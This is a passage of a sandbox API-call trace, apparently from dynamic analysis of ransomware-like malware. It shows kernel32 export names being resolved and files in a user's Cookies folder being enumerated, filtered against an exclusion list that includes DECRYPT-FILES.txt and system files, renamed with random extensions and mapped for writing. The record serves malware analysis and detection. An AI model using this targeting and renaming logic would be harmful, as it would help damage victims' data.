lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.730] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.731] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.731] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.731] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.731] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.731] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.731] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.731] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.731] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.731] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.731] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.731] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.731] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.731] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.731] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.731] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.731] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.731] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.732] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.732] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.732] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.732] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.732] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.732] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.732] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.732] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.732] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.732] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.732] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.732] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.732] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.732] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.732] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.732] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.732] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.732] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.733] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.733] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.733] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.733] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.733] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.733] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.733] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.733] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.735] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.735] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.735] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.736] lstrlenA (lpString="DELETEATOM") returned 10 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.736] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.736] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.736] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.736] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.736] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.736] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.736] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.736] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.736] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.736] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.736] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.736] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.736] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.736] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.736] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.736] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.736] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.736] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.737] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.737] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.737] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.737] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.737] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.737] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.737] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.737] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.737] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.737] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.737] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.737] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.737] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.737] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.737] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.737] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.737] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.737] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.737] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.738] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.738] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.738] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.738] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.738] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.738] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.738] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.738] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.738] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.738] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.738] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.738] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.738] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA") returned 116 [0181.738] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA.xPj5DI3") returned 124 [0181.738] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzha"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA.xPj5DI3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzha.xpj5di3"), dwFlags=0x0) returned 1 [0181.739] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.739] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.739] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.740] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e777a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x64e777a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab8ba3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x327, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", cAlternateFileName="5P5NRG~1.P2M")) returned 1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="DECRYPT-FILES.txt") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="autorun.inf") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="boot.ini") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="desktop.ini") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="ntuser.dat") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="iconcache.db") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="bootsect.bak") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="ntuser.dat.log") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="thumbs.db") returned -1 [0181.740] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX", lpString2="Bootfont.bin") returned -1 [0181.740] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX") returned 41 [0181.740] lstrcmpiW (lpString1="p2mOyX", lpString2="lnk") returned 1 [0181.740] lstrcmpiW (lpString1="p2mOyX", lpString2="exe") returned 1 [0181.740] lstrcmpiW (lpString1="p2mOyX", lpString2="sys") returned -1 [0181.740] lstrcmpiW (lpString1="p2mOyX", lpString2="dll") returned 1 [0181.740] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.740] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX") returned 41 [0181.740] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.740] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX" [0181.740] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.p2mOyX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt.p2moyx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.741] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=807) returned 1 [0181.741] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.741] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.742] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.742] CloseHandle (hObject=0x288) returned 1 [0181.742] CloseHandle (hObject=0x284) returned 1 [0181.742] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.742] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x465ba5f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x465ba5f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab9066a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x218, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", cAlternateFileName="5P5NRG~1.EVB")) returned 1 [0181.742] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="DECRYPT-FILES.txt") returned -1 [0181.742] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="autorun.inf") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="boot.ini") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="desktop.ini") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="ntuser.dat") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="iconcache.db") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="bootsect.bak") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="ntuser.dat.log") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="thumbs.db") returned -1 [0181.743] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp", lpString2="Bootfont.bin") returned -1 [0181.743] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp") returned 44 [0181.743] lstrcmpiW (lpString1="eVBeLFp", lpString2="lnk") returned -1 [0181.743] lstrcmpiW (lpString1="eVBeLFp", lpString2="exe") returned -1 [0181.743] lstrcmpiW (lpString1="eVBeLFp", lpString2="sys") returned -1 [0181.743] lstrcmpiW (lpString1="eVBeLFp", lpString2="dll") returned 1 [0181.743] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.743] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp") returned 44 [0181.743] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS 